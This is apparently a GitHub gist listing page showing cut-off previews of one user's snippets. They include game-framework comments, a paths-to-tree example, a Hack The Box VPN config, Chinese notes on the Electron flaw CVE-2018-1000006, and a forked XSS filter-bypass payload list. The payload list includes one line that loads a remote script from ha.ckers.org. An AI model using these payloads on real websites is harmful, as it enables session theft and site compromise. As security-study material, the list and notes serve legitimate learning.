Skip to content

Instantly share code, notes, and snippets.

// Learn cc.Class:
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/class.html
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/class.html
// Learn Attribute:
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/reference/attributes.html
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/reference/attributes.html
// Learn life-cycle callbacks:
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/life-cycle-callbacks.html
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/life-cycle-callbacks.html
/**
* 此处,尝试对德州的游戏,进行 框架的抽取。
*/
declare namespace AbstractGame {
/*进入房间*/
interface EnterRoom {
initRoom(): void;//整个房间初始化
initRunningRound(): void;//若当前牌局进行中
initXiuxiRound(): void;//若当前牌局休息中
// 当前用户不是经纪商
if (this.userDetail.isAgent == 0) {
if (this.setNewcomer == '0') {
// 修改当前普通用户经纪商信息
const postData = {}
postData.agentId = this.ruleForm.parentId
postData.userId = this.ruleForm.userId
res = await this.userApi.agentApi.createNormalAgent(postData)
} else {
// 修改当前用户为经纪商
// 缩放 放大事件
_pinchout(e) {
let now = new Date().getTime();
let offset = tool.offset(this.$refs.touch_com.$el);
if (!this.pinchoutTimer || now - this.pinchoutTimer >= 300) {
@hanshou101
hanshou101 / index.js
Created February 20, 2021 05:01 — forked from stephanbogner/index.js
Create tree structure from paths array
var paths = [
["Account"],
["Account", "Payment Methods"],
["Account", "Payment Methods", "Credit Card"],
["Account", "Payment Methods", "Paypal"],
["Account", "Emails"],
["Account", "Emails", "Main Email"],
["Account", "Emails", "Backup Email"],
["Account", "Devices"],
["Account", "Devices", "Google Pixel"],
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
@hanshou101
hanshou101 / eu.ovpn
Last active February 27, 2021 10:15
eu.ovpn
client
dev tun
proto udp
remote edge-eu-starting-point-vip-1.hackthebox.eu 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
@hanshou101
hanshou101 / xxsfilterbypass.lst
Created April 1, 2021 23:26 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<script>alert(1)</script>
@hanshou101
hanshou101 / 【CVE-2018-1000006】.md
Created May 21, 2021 09:40
【CVE-2018-1000006】.md
  1. 【CVE-2018-1000006】
    1. 参考资料:
      1. 后来,补上的一篇,考古资料:
        1. Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
          1. 讲了很多,其它的【奇门相关方法】。
      2. 可直接上手复现,的Demo环境:
        1. 信息来源:Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】 - 先知社区
        2. GitHub仓库:CHYbeta/CVE-2018-1000006-DEMO: The Demo for CVE-2018-1000006
    2. Electron,在【1.8.2】及更早版本,在【协议处理程序】中 存在漏洞。
      1. 特别是,在 Win10 、Win7 、 Windows 2008 上,运行的Electron程序,可以【注册自定义协议处理程序】